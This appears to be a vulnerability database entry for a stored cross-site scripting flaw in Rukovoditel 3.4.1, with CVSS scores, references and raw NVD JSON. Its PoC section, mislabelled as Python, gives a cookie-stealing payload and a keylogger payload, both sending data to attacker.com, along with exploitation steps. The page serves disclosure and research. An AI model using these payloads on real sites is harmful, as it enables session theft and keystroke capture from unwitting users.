CVE-2023-53897

Description

Rukovoditel 3.4.1 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert XSS payloads in project task comments to execute arbitrary JavaScript in victim browsers.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:rukovoditel:rukovoditel:3.4.1:*:*:*:*:*:*:* - VULNERABLE

Rukovoditel 3.4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53897 PoC - Stored XSS in Rukovoditel Task Comments
// Target: Rukovoditel 3.4.1
// Attack Vector: Inject malicious JavaScript in project task comments

// XSS Payload for stealing session cookies
var xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Alternative XSS payload - Keylogger
var keylogger_payload = '<img src=x onerror="var keys=\'\';document.onkeypress=function(e){keys+=e.key};setInterval(function(){if(keys)fetch(\'https://attacker.com/log?k=\'+btoa(keys))},5000)">';

// Steps to exploit:
// 1. Authenticate with low-privilege account
// 2. Navigate to any project task
// 3. Add comment with XSS payload
// 4. Wait for victim to view the task
// 5. Malicious script executes in victim's browser

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53897
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53897
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53897/
[4] VulDB https://vuldb.com/cve/CVE-2023-53897
[5] https://www.exploit-db.com/exploits/51548
[6] https://www.rukovoditel.net/
[7] https://www.vulncheck.com/advisories/rukovoditel-multiple-stored-cross-site-scripting-via-comments

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53897", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:01.900", "lastModified": "2025-12-27T17:15:42.077", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rukovoditel 3.4.1 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject malicious scripts. Attackers can insert XSS payloads in project task comments to execute arbitrary JavaScript in victim browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rukovoditel:rukovoditel:3.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "AE728A4C-C775-42DE-873D-605F77758927"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/51548", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.rukovoditel.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/rukovoditel-multiple-stored-cross-site-scripting-via-comments", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}